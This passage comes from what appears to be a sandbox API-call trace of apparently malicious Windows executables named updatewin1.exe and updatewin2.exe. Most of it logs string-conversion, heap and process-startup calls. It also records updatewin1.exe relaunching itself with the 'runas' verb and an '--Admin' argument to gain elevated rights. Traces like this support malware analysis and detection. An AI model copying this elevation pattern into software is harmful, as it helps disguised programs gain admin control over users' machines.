!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0043.955] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0043.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿY}uËHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0043.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2aa0d0 [0043.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe")) returned 0x5f [0043.955] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xc8) returned 0x2ac160 [0043.955] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0043.955] GetLastError () returned 0x0 [0043.956] GetEnvironmentStringsW () returned 0x2ac230* [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xaca) returned 0x2acd08 [0043.956] FreeEnvironmentStringsW (penv=0x2ac230) returned 1 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x98) returned 0x2ac230 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3e) returned 0x2ad7f8 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x6c) returned 0x2ac2d0 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x6e) returned 0x2ac348 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x78) returned 0x291180 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x62) returned 0x2ac3c0 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x2952d0 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x2ac430 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x28) returned 0x2aa158 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x2abd10 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4a) returned 0x2ac480 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x72) returned 0x291200 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x295308 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x295340 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1c) returned 0x2abd38 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xd2) returned 0x2ac4d8 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x7c) returned 0x2ac5b8 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x36) returned 0x2ac640 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3a) returned 0x2ad840 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x90) returned 0x2ac680 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x24) returned 0x2ac718 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x295378 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x36) returned 0x2ac748 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x48) returned 0x2ac788 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x52) returned 0x2ac7d8 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3c) returned 0x2ad888 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x82) returned 0x2ac838 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2e) returned 0x2953b0 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1e) returned 0x2abd60 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2c) returned 0x2953e8 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x2ac8c8 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x52) returned 0x2ac928 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2a) returned 0x295420 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x3c) returned 0x2ad8d0 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x2ac988 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x24) returned 0x2ac9e8 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x30) returned 0x295458 [0043.956] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8c) returned 0x2aca18 [0043.956] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2acd08 | out: hHeap=0x280000) returned 1 [0043.957] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x800) returned 0x2acab0 [0043.957] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0043.957] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0043.964] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0043.965] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" " [0043.965] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x2ad2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" [0043.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0xc0) returned 0x2ad388 [0043.965] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" [0043.965] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned 1 [0043.965] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0043.965] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0044.855] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2ad388 | out: hHeap=0x280000) returned 1 [0044.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0044.855] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0044.856] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2aa0d0 | out: hHeap=0x280000) returned 1 [0044.856] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2acab0 | out: hHeap=0x280000) returned 1 [0044.856] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.856] GetLastError () returned 0x57 [0044.856] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0044.856] ExitProcess (uExitCode=0x0) [0044.857] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2aa9e8 | out: hHeap=0x280000) returned 1 [0044.858] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 51 os_tid = 0x9fc Thread: id = 53 os_tid = 0xa08 Thread: id = 54 os_tid = 0xa0c Thread: id = 55 os_tid = 0xa10 Process: id = "7" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe" page_root = "0x4ed7d000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x938" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 50 os_tid = 0x9f8 [0043.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x188568f0, dwHighDateTime=0x1d5956a)) [0043.889] GetCurrentProcessId () returned 0x9f4 [0043.889] GetCurrentThreadId () returned 0x9f8 [0043.889] GetTickCount () returned 0x11448c4 [0043.889] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=16406512818) returned 1 [0043.902] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0043.902] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1eb0000 [0043.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.903] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0043.903] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0043.903] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0043.903] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0043.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.904] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.904] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.904] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.904] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.904] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.904] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.904] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.904] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.905] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.905] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.905] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.905] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.905] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.905] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.905] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0043.905] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x214) returned 0x1eb07d0 [0043.906] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.906] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0043.906] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.906] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.906] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0043.906] GetCurrentThreadId () returned 0x9f8 [0043.906] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0043.906] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x800) returned 0x1eb09f0 [0043.906] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0043.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0043.906] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0043.906] SetHandleCount (uNumber=0x20) returned 0x20 [0043.906] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe\" " [0043.906] GetEnvironmentStringsW () returned 0x4e4e70* [0043.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0043.907] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x0, Size=0x565) returned 0x1eb11f8 [0043.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1eb11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0043.907] FreeEnvironmentStringsW (penv=0x4e4e70) returned 1 [0043.907] GetLastError () returned 0x0 [0043.907] SetLastError (dwErrCode=0x0) [0043.907] GetLastError () returned 0x0 [0043.907] SetLastError (dwErrCode=0x0) [0043.907] GetLastError () returned 0x0 [0043.907] SetLastError (dwErrCode=0x0) [0043.907] GetACP () returned 0x4e4 [0043.907] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x0, Size=0x220) returned 0x1eb1768 [0043.907] GetLastError () returned 0x0 [0043.907] SetLastError (dwErrCode=0x0) [0043.907] IsValidCodePage (CodePage=0x4e4) returned 1 [0043.907] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0043.907] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0043.907] GetLastError () returned 0x0 [0043.907] SetLastError (dwErrCode=0x0) [0043.907] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0043.907] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.907] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0043.907] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0043.907] GetLastError () returned 0x0 [0043.907] SetLastError (dwErrCode=0x0) [0043.907] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0043.907] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.907] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒪쥩㞅AĀ") returned 256 [0043.907] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 